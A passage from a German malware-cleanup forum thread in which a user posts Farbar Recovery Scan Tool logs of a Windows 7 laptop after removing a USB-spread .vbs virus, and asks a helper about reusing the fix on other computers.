HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-20] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-25] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-20] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\Default\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe /default
HKU\Default User\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe /default
HKU\Franz\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)

==================== Services (Whitelisted) =================

S2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
S2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
S2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
S2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
S2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

S5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
S1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
S1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
S1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-28 12:43 - 2014-04-28 12:43 - 00000439 _____ () C:\Users\Franz\Desktop\Fixlist.txt
2014-04-27 17:14 - 2014-04-27 17:14 - 00039936 _____ () C:\Users\Franz\Desktop\Kalender.xls
2014-04-24 20:43 - 2014-04-24 20:43 - 01048576 _____ (Farbar) C:\Users\Franz\Desktop\FRST.exe
2014-04-24 20:31 - 2014-04-27 13:10 - 02061824 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-23 08:44 - 2014-04-23 08:44 - 00000341 _____ () C:\Users\Franz\Desktop\CFScript.txt
2014-04-23 08:39 - 2014-04-23 08:39 - 00018305 _____ () C:\ComboFix.txt
2014-04-22 14:27 - 2014-04-22 14:32 - 00000000 ____D () C:\Users\Franz\Desktop\Air Niugini
2014-04-22 07:26 - 2014-04-22 07:27 - 02237968 _____ (Kaspersky Lab ZAO) C:\Users\Franz\Desktop\tdsskiller.exe
2014-04-21 18:48 - 2014-04-21 19:35 - 00000000 ____D () C:\Users\Franz\Desktop\Projekt
2014-04-21 17:28 - 2014-04-21 17:28 - 05196870 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-21 16:40 - 2014-04-27 21:58 - 00000000 ____D () C:\Program Files (x86)\Smadav
2014-04-21 16:40 - 2014-04-21 16:40 - 00003240 _____ () C:\Windows\System32\Tasks\smadav
2014-04-21 16:40 - 2014-04-21 16:40 - 00000718 _____ () C:\Users\Public\Desktop\SMADΔV.lnk
2014-04-21 16:40 - 2014-04-21 16:40 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Smadav
2014-04-19 19:20 - 2014-04-19 19:21 - 00025978 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-18 13:13 - 2014-04-18 13:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-16 13:57 - 2014-04-16 13:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 13:46 - 2014-04-16 13:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 13:07 - 2014-04-16 13:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\MBAMSwissArmy.sys
2014-04-16 13:06 - 2014-04-16 13:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 13:06 - 2014-04-16 13:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 13:06 - 2014-04-16 13:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 13:06 - 2014-04-02 23:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mbamchameleon.sys
2014-04-16 13:06 - 2014-04-02 23:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mwac.sys
2014-04-16 13:06 - 2014-04-02 23:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mbam.sys
2014-04-15 16:56 - 2014-04-23 08:40 - 00000000 ____D () C:\Qoobox
2014-04-15 16:56 - 2014-04-15 17:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-15 16:56 - 2011-06-25 22:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-15 16:56 - 2010-11-07 09:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-15 16:56 - 2009-04-19 20:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-15 16:52 - 2014-04-15 16:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-15 16:52 - 2014-04-15 16:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-15 16:50 - 2014-04-15 16:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-14 01:21 - 2008-03-21 18:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 01:19 - 2010-01-05 06:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 00:43 - 2014-04-28 22:48 - 00000000 ____D () C:\FRST
2014-04-10 19:39 - 2014-03-04 04:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-06 23:32 - 2014-04-27 13:07 - 00000000 ____D () C:\[Smad-Cage]
2014-04-06 23:30 - 2014-04-06 23:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 00:10 - 2014-04-21 16:27 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-01 22:42 - 2014-04-16 12:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-01 22:27 - 2014-04-01 22:27 - 00000000 ____D () C:\Windows\pss
2014-04-01 22:19 - 2014-04-01 22:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-01 22:19 - 2014-04-01 22:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-01 20:29 - 2013-02-01 00:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-01 20:15 - 2013-03-02 20:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv

==================== One Month Modified Files and Folders =======

2014-04-28 22:48 - 2014-04-14 00:43 - 00000000 ____D () C:\FRST
2014-04-28 12:45 - 2013-04-16 09:13 - 02062847 _____ () C:\Windows\WindowsUpdate.log
2014-04-28 12:43 - 2014-04-28 12:43 - 00000439 _____ () C:\Users\Franz\Desktop\Fixlist.txt
2014-04-28 12:40 - 2013-04-16 10:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-28 12:39 - 2013-04-16 10:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-28 03:21 - 2013-10-03 12:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-04-28 03:16 - 2009-07-13 20:51 - 00089688 _____ () C:\Windows\setupact.log
2014-04-28 02:53 - 2013-04-16 10:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-27 22:06 - 2009-07-13 20:45 - 00022672 ____H () C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-27 22:06 - 2009-07-13 20:45 - 00022672 ____H () C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-27 21:58 - 2014-04-21 16:40 - 00000000 ____D () C:\Program Files (x86)\Smadav
2014-04-27 21:56 - 2009-07-13 21:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-27 17:14 - 2014-04-27 17:14 - 00039936 _____ () C:\Users\Franz\Desktop\Kalender.xls
2014-04-27 13:10 - 2014-04-24 20:31 - 02061824 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-27 13:07 - 2014-04-06 23:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-24 20:43 - 2014-04-24 20:43 - 01048576 _____ (Farbar) C:\Users\Franz\Desktop\FRST.exe
2014-04-24 20:39 - 2010-05-10 15:15 - 00116164 _____ () C:\Windows\PFRO.log
2014-04-23 08:44 - 2014-04-23 08:44 - 00000341 _____ () C:\Users\Franz\Desktop\CFScript.txt
2014-04-23 08:40 - 2014-04-15 16:56 - 00000000 ____D () C:\Qoobox
2014-04-23 08:39 - 2014-04-23 08:39 - 00018305 _____ () C:\ComboFix.txt
2014-04-23 08:16 - 2009-07-13 18:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-23 08:00 - 2013-04-16 10:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-04-22 14:32 - 2014-04-22 14:27 - 00000000 ____D () C:\Users\Franz\Desktop\Air Niugini
2014-04-22 07:27 - 2014-04-22 07:26 - 02237968 _____ (Kaspersky Lab ZAO) C:\Users\Franz\Desktop\tdsskiller.exe
2014-04-21 19:35 - 2014-04-21 18:48 - 00000000 ____D () C:\Users\Franz\Desktop\Projekt
2014-04-21 17:28 - 2014-04-21 17:28 - 05196870 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-21 16:40 - 2014-04-21 16:40 - 00003240 _____ () C:\Windows\System32\Tasks\smadav
2014-04-21 16:40 - 2014-04-21 16:40 - 00000718 _____ () C:\Users\Public\Desktop\SMADΔV.lnk
2014-04-21 16:40 - 2014-04-21 16:40 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Smadav
2014-04-21 16:27 - 2014-04-03 00:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-19 19:21 - 2014-04-19 19:20 - 00025978 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-19 18:46 - 2013-04-16 19:01 - 00696870 _____ () C:\Windows\System32\perfh007.dat
2014-04-19 18:46 - 2013-04-16 19:01 - 00148134 _____ () C:\Windows\System32\perfc007.dat
2014-04-19 18:46 - 2009-07-13 21:13 - 01612484 _____ () C:\Windows\System32\PerfStringBackup.INI
2014-04-18 17:21 - 2013-04-16 10:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-18 13:13 - 2014-04-18 13:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-16 14:00 - 2014-03-11 07:56 - 00000000 ____D () C:\AdwCleaner
2014-04-16 13:59 - 2014-04-16 13:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 13:46 - 2014-04-16 13:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 13:10 - 2014-04-16 13:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\MBAMSwissArmy.sys
2014-04-16 13:06 - 2014-04-16 13:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 13:06 - 2014-04-16 13:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 13:06 - 2014-04-16 13:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 12:12 - 2014-04-01 22:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-15 17:43 - 2009-07-13 19:20 - 00000000 __RHD () C:\users\Default
2014-04-15 17:35 - 2014-04-15 16:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-15 16:52 - 2014-04-15 16:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-15 16:52 - 2014-04-15 16:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-15 16:50 - 2014-04-15 16:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-14 00:20 - 2013-04-16 11:29 - 00000000 ____D () C:\Setups
2014-04-06 23:30 - 2014-04-06 23:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-05 22:23 - 2013-04-16 10:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-05 22:23 - 2013-04-16 10:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-02 23:51 - 2014-04-16 13:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mbamchameleon.sys
2014-04-02 23:51 - 2014-04-16 13:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mwac.sys
2014-04-02 23:50 - 2014-04-16 13:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mbam.sys
2014-04-01 22:54 - 2014-04-01 22:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-01 22:27 - 2014-04-01 22:27 - 00000000 ____D () C:\Windows\pss
2014-04-01 22:25 - 2013-04-16 10:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-01 22:24 - 2013-04-16 10:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-01 22:19 - 2014-04-01 22:19 - 00000000 ____D () C:\ProgramData\Norton
2014-03-30 18:12 - 2014-02-28 03:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe


==================== Known DLLs (Whitelisted) ================


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

==================== EXE ASSOCIATION =====================

HKLM\...\.exe: exefile => OK
HKLM\...\exefile\DefaultIcon: %1 => OK
HKLM\...\exefile\open\command: "%1" %* => OK

==================== Restore Points  =========================

Restore point made on: 2014-03-04 04:16:53
Restore point made on: 2014-03-13 18:01:05
Restore point made on: 2014-03-23 14:56:49
Restore point made on: 2014-04-01 23:56:23
Restore point made on: 2014-04-02 04:47:26
Restore point made on: 2014-04-15 16:57:13
Restore point made on: 2014-04-20 15:04:46
Restore point made on: 2014-04-21 17:31:02

==================== Memory info ===========================

Percentage of memory in use: 19%
Total physical RAM: 3764.43 MB
Available physical RAM: 3047.62 MB
Total Pagefile: 3762.57 MB
Available Pagefile: 3034.05 MB
Total Virtual: 8192 MB
Available Virtual: 8191.91 MB

==================== Drives ================================

Drive c: (ACER) (Fixed) (Total:452.97 GB) (Free:29.47 GB) NTFS
Drive e: (PQSERVICE) (Fixed) (Total:12.7 GB) (Free:2.56 GB) NTFS
Drive f: () (Removable) (Total:14.63 GB) (Free:14.62 GB) FAT32
Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
Drive y: (SYSTEM RESERVED) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 466 GB) (Disk ID: 59D459D4)
Partition 1: (Not Active) - (Size=13 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=453 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 15 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=15 GB) - (Type=0C)


LastRegBack: 2014-03-23 14:49

==================== End Of Log ============================

--- --- ---



So wies ausschaut ist der Virus weg, auf dem Stick kommt nach dem Formatieren keine neue .vbs, vielen dank schonmal!! :)

Jetzt hab ich noch eine Frage: kann ich diese Fixlist auch auf anderen Computern anwenden, wenn ich die Pfadnamen anpasse? Hier bei mir im Dorf ist dieser Virus auf so gut wie jedem Computer, aber mit den meisten komme ich nicht ans Internet und ich halte es auch für wenig sinnvoll für jeden hier ein neues Thema aufzumachen ;)

kann übrigens nur noch über einen Proxy aufs Trojaner-Board, alle anderen Seiten gehen nach wie vor problemlos, gibts da einen Trick?

schrauber 29.04.2014 19:52

Kannste versuchen, auf eigene Gefahr :)

Zitat:

kann übrigens nur noch über einen Proxy aufs Trojaner-Board, alle anderen Seiten gehen nach wie vor problemlos, gibts da einen Trick?
Poste mal ein frisches FRST log aus dem normalen Modus. Und beschreib das mal genauer, was pasiert ohne Proxy?

fxak 30.04.2014 07:39

Ok, und langt das dann den Virus zu entfernen, oder war einer der vorherigen Schritte zwingend notwendig?

Jetzt gehts wieder, war wohl ein Problem mit meinem Internet, die Seite hat einfach nicht geladen.
FRST-Log gibts aber zur Sicherheit trotzdem mal:


FRST Logfile:
Code:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-04-2014
Ran by Franz (administrator) on FRANZ-PC on 30-04-2014 08:13:17
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal


==================== Processes (Whitelisted) =================

(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Smadsoft) C:\Program Files (x86)\Smadav\SMΔRTP.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
(Adobe Systems Incorporated) c:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Updater6\Adobe_Updater.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer VCM.lnk
ShortcutTarget: Acer VCM.lnk -> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (Acer Incorporated)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VR-NetWorld Auftragsprüfung.lnk
ShortcutTarget: VR-NetWorld Auftragsprüfung.lnk -> C:\Program Files (x86)\VR-NetWorld\VRToolCheckOrder.exe (VR-NetWorld Software)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
